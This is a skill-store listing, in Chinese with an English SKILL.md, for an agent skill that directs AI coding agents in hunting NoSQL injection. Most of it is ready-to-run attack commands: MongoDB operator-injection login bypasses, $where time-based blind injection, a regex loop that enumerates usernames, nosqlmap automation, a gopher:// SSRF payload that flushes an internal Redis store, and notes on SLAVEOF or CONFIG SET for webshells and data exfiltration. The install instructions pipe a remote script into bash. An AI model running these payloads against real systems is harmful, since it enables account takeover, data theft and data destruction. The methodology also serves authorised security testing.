‹ 首页

hunt-nosqli

@elementalsouls · 收录于 1 周前 · 上游提交 2 周前

Hunt NoSQL Injection — MongoDB operator injection ($where, $regex, $gt, $ne), CouchDB, Redis command injection, auth bypass via NoSQLi, data dump. Use when target uses MongoDB/Mongoose, CouchDB, Redis, or shows NoSQL error messages.

适合你,如果需要在 MongoDB、CouchDB 或 Redis 上测试 NoSQL 注入漏洞。

/ 下载安装
hunt-nosqli.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add elementalsouls/claude-bughunter/hunt-nosqli
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- elementalsouls/claude-bughunter/hunt-nosqli
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify elementalsouls/claude-bughunter/hunt-nosqli
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2927GitHub stars
~1.2K上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 05098fc · 表述以原文为准
它做什么

装上后,Claude 会帮你检测和利用 NoSQL 注入漏洞,包括 MongoDB 操作符注入、CouchDB 和 Redis 命令注入,以及绕过认证、提取数据等。

什么时候触发

当目标使用 MongoDB、CouchDB、Redis 等 NoSQL 数据库,或返回 NoSQL 错误信息时触发。

装好后可以这样说
Claude 会尝试操作符注入绕过认证。
Claude 会构造时间延迟注入并逐字符枚举。
Claude 会测试数组语法和正则注入。
技能原文 SKILL.md作者撰写 · MIT · 05098fc

HUNT-NOSQLI — NoSQL Injection

Crown Jewel Targets

NoSQL injection is most valuable when it bypasses authentication (Critical) or leaks the entire user collection (High).

Highest-value chains:

  • MongoDB auth bypass{"username": {"$gt": ""}, "password": {"$gt": ""}} logs in as first user in collection (usually admin)
  • $where JS injection — if $where is enabled: blind injection → data exfil
  • Redis command injection — via SSRF or direct TCP, SLAVEOF attacker-ip → config write → webshell
  • Elasticsearch injection — _search endpoint with Groovy script injection (pre-5.0) → RCE

Attack Surface Signals
URL & Param Patterns
/api/users/login         POST with JSON body
/api/search?q=
/api/find?filter=
/api/query?where=
Any endpoint accepting JSON body with username/password
Stack Signals

| Signal | Vector | |--------|--------| | MongoDB error messages in response | Operator injection | | mongoose / monk in JS bundles | ODM patterns | | X-Powered-By: Express | Node.js + MongoDB common stack | | CouchDB/_utils UI exposed | Futon/Fauxton admin | | Redis port 6379 open (via SSRF) | CONFIG SET / SLAVEOF | | Elasticsearch :9200 open | Script injection |


Step-by-Step Hunting Methodology
Phase 1 — Auth Bypass (MongoDB)
# Operator injection in JSON body
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Regex wildcard — match any username
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}'

# ne (not equal) bypass
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$ne": "wrong"}}'

# in array bypass
curl -s -X POST https://$TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$in": ["admin","administrator","root"]}, "password": {"$ne": "x"}}'
Phase 2 — URL Parameter Injection
# Array notation (Express/PHP-style)
curl "https://$TARGET/api/users?username[$gt]=&password[$gt]="
curl "https://$TARGET/api/search?q[$regex]=.*&q[$options]=i"

# POST form data
curl "https://$TARGET/api/login" \
  --data "username[$gt]=&password[$gt]="
Phase 3 — $where Blind Injection (time-based)
# Test if $where is enabled (time-based detection, 5s delay)
curl -s -X POST https://$TARGET/api/search \
  -H "Content-Type: application/json" \
  -d '{"q": {"$where": "function(){var d=new Date();while(new Date()-d<5000){}; return true;}"}}'
# If response takes 5+ seconds → $where injection confirmed

# Blind data exfil (username starts with 'a'?)
curl -s -X POST https://$TARGET/api/search \
  -H "Content-Type: application/json" \
  -d '{"q": {"$where": "function(){if(this.username.match(/^a/)){sleep(3000);} return true;}"}}'
Phase 4 — Data Dump via Regex
# Enumerate usernames character by character
for c in a b c d e f g h i j k l m n o p q r s t u v w x y z; do
  RESP=$(curl -s -X POST https://$TARGET/api/users \
    -H "Content-Type: application/json" \
    -d "{\"username\": {\"\$regex\": \"^$c\"}}")
  echo "$c: $(echo $RESP | wc -c)"
done
Phase 5 — Automation
# nosqlmap
pip3 install nosqlmap
nosqlmap -u "https://$TARGET/api/login" --attack 1

# nosqlmap data extraction
nosqlmap -u "https://$TARGET/api/login" --attack 2
Phase 6 — Redis via SSRF
# If SSRF found, probe internal Redis via gopher://
curl "https://$TARGET/fetch?url=gopher://127.0.0.1:6379/_*1%0d%0a%248%0d%0aflushall%0d%0a"

# CONFIG SET webshell (if Redis has write access to web root)
# Use SLAVEOF for OOB data exfil

Bypass Table

| Defense | Bypass | |---------|--------| | JSON.parse rejects objects | Use array: password[$ne]=x (URL params) | | Sanitizes $ | Unicode: $gt | | Blocks operator keys | Nested objects deeper in structure |


Chain Table

| NoSQLi finding | Chain to | Impact | |---------------|----------|--------| | Auth bypass | Admin panel access | Full admin control | | User enum via regex | Credential stuffing | Mass ATO | | $where enabled | Arbitrary JS in DB process | Data exfil or DoS | | Redis via SSRF | CONFIG SET / SLAVEOF | Webshell or data exfil |


Validation

✅ Auth bypass: logged in without valid credentials, received valid session token ✅ Data dump: returned users/documents you shouldn't have access to ✅ Blind injection: confirmed via time-delay (>4 seconds consistent)

Severity:

  • Auth bypass as admin: Critical
  • User collection dump: High
  • Blind injection (no useful exfil): Medium
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。